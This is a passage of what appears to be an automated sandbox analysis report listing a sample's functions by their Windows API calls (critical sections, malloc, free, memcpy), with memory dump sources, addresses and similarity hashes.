                                                                  • Instruction Fuzzy Hash: 11919C35605616CFCF25CF08C890A56BBA2BF99318B288A8DDC589B715D371FC42CBE1
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(6C94E7DC), ref: 6C900918
                                                                  • LeaveCriticalSection.KERNEL32(6C94E7DC), ref: 6C9009A6
                                                                  • EnterCriticalSection.KERNEL32(6C94E7DC,?,00000000), ref: 6C9009F3
                                                                  • LeaveCriticalSection.KERNEL32(6C94E7DC), ref: 6C900ACB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLeave
                                                                  • String ID:
                                                                  • API String ID: 3168844106-0
                                                                  • Opcode ID: b38536555bbbc7c67c39e08c488a1c3304a06a9011b8e5eb91539f8cd291709c
                                                                  • Instruction ID: 57fc456de225b9afb5d7d6c252d84e58dcf45472e6d13ae0e1beef9bda50a7a7
                                                                  • Opcode Fuzzy Hash: b38536555bbbc7c67c39e08c488a1c3304a06a9011b8e5eb91539f8cd291709c
                                                                  • Instruction Fuzzy Hash: 4F511536B05A508BEB08EE19C415A2673B5EBC2B3CB35D53ED97597F80DB30E80186D0
                                                                  APIs
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6C91B2C9,?,?,?,6C91B127,?,?,?,?,?,?,?,?,?,6C91AE52), ref: 6C91B628
                                                                    • Part of subcall function 6C9190E0: free.MOZGLUE(?,00000000,?,?,6C91DEDB), ref: 6C9190FF
                                                                    • Part of subcall function 6C9190E0: free.MOZGLUE(?,00000000,?,?,6C91DEDB), ref: 6C919108
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C91B2C9,?,?,?,6C91B127,?,?,?,?,?,?,?,?,?,6C91AE52), ref: 6C91B67D
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C91B2C9,?,?,?,6C91B127,?,?,?,?,?,?,?,?,?,6C91AE52), ref: 6C91B708
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6C91B127,?,?,?,?,?,?,?,?), ref: 6C91B74D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: freemalloc
                                                                  • String ID:
                                                                  • API String ID: 3061335427-0
                                                                  • Opcode ID: 899b662f388eddfe1547b6bbad7b9df33bc3c001b05556bdeea011a3f6cebfb1
                                                                  • Instruction ID: 7ca0d4e1606265d0e54e06264c93103cc4a9b852222c7da8576231ae6ddc3eba
                                                                  • Opcode Fuzzy Hash: 899b662f388eddfe1547b6bbad7b9df33bc3c001b05556bdeea011a3f6cebfb1
                                                                  • Instruction Fuzzy Hash: 7651CDB1A0921ACFEB14CF18C98166EB7B6FF85714F55852DC85AABF10D731E804CBA1
                                                                  APIs
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6C90FF2A), ref: 6C91DFFD
                                                                    • Part of subcall function 6C9190E0: free.MOZGLUE(?,00000000,?,?,6C91DEDB), ref: 6C9190FF
                                                                    • Part of subcall function 6C9190E0: free.MOZGLUE(?,00000000,?,?,6C91DEDB), ref: 6C919108
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C90FF2A), ref: 6C91E04A
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C90FF2A), ref: 6C91E0C0
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6C90FF2A), ref: 6C91E0FE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: freemalloc
                                                                  • String ID:
                                                                  • API String ID: 3061335427-0
                                                                  • Opcode ID: 202c6d9d8d8933069a36a7c9643d7f4fd6ec8ea4370e37faeb369624e7a36ebc
                                                                  • Instruction ID: 9a269648811ff7056b67b85a913717154b4a9df317e01d909853e70ada1b9e02
                                                                  • Opcode Fuzzy Hash: 202c6d9d8d8933069a36a7c9643d7f4fd6ec8ea4370e37faeb369624e7a36ebc
                                                                  • Instruction Fuzzy Hash: 6841CFB560C20ACFEB14CF68C88636A73B6BB45308F254929D517DBF40E732E904CB92
                                                                  APIs
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018), ref: 6C916EAB
                                                                  • memcpy.VCRUNTIME140(00000000,00000018,-000000A0), ref: 6C916EFA
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C916F1E
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C916F5C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: malloc$freememcpy
                                                                  • String ID:
                                                                  • API String ID: 4259248891-0
                                                                  • Opcode ID: 616454ac5845609d3c9fc31395425da1e4d8b79a1992f65033b1044023313d33
                                                                  • Instruction ID: bf1976236e3e4b042045cb747d8adbd35916e959e9cf2d14d616bb636a49d49e
                                                                  • Opcode Fuzzy Hash: 616454ac5845609d3c9fc31395425da1e4d8b79a1992f65033b1044023313d33
                                                                  • Instruction Fuzzy Hash: 7831F671A1460A8FDB04CF2CC9816AE73E9EB94304F50823DD41AC7A51EF31E669C790
                                                                  APIs
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C8D0A4D), ref: 6C92B5EA
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6C8D0A4D), ref: 6C92B623
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C8D0A4D), ref: 6C92B66C
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,?,?,6C8D0A4D), ref: 6C92B67F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: malloc$free
                                                                  • String ID:
                                                                  • API String ID: 1480856625-0
                                                                  • Opcode ID: 8bc648d64e4ee0299d98ee505fb5457e4909b93d59145a94be6324cb28c3bbb4
                                                                  • Instruction ID: bbc298c5a9124ba7f0831100479c3fe96058f5cfc387dc9e75795dae3d3ca669
                                                                  • Opcode Fuzzy Hash: 8bc648d64e4ee0299d98ee505fb5457e4909b93d59145a94be6324cb28c3bbb4
                                                                  • Instruction Fuzzy Hash: BE310871A112168FDB10DF58C844A6AB7F9FF80325F168629C85B9B305DB35E915CBE0
                                                                  APIs
                                                                  • memcpy.VCRUNTIME140(?,?,00010000), ref: 6C8FF611
                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C8FF623
                                                                  • memcpy.VCRUNTIME140(?,?,00010000), ref: 6C8FF652
                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C8FF668
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy
                                                                  • String ID:
                                                                  • API String ID: 3510742995-0
                                                                  • Opcode ID: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                                                  • Instruction ID: 6304d3d283e1ed2c5d41bfce3ebcc5d4ff6659f6d3b69a3aebacbe789401d825
                                                                  • Opcode Fuzzy Hash: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                                                  • Instruction Fuzzy Hash: D8313071A00624AFCB24CF69CDC0A9F77F5EB98354B148939EA598BB04D731E945CB90
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: free
                                                                  • String ID:
                                                                  • API String ID: 1294909896-0
                                                                  • Opcode ID: 7013f597d4d878f04dc2f75352a360cf1d73063eb8f50f693735d0c9fcb7d761
                                                                  • Instruction ID: e5b7ceaac5aa5906dd6df3cf23b4fcf892f1f0bbb0b60ff22d35e19255bc78ac
                                                                  • Opcode Fuzzy Hash: 7013f597d4d878f04dc2f75352a360cf1d73063eb8f50f693735d0c9fcb7d761
                                                                  • Instruction Fuzzy Hash: 09F0F9B27056095BEB10AA58D88595B73ADEF5635CB240035EA16C3F01E332F918C691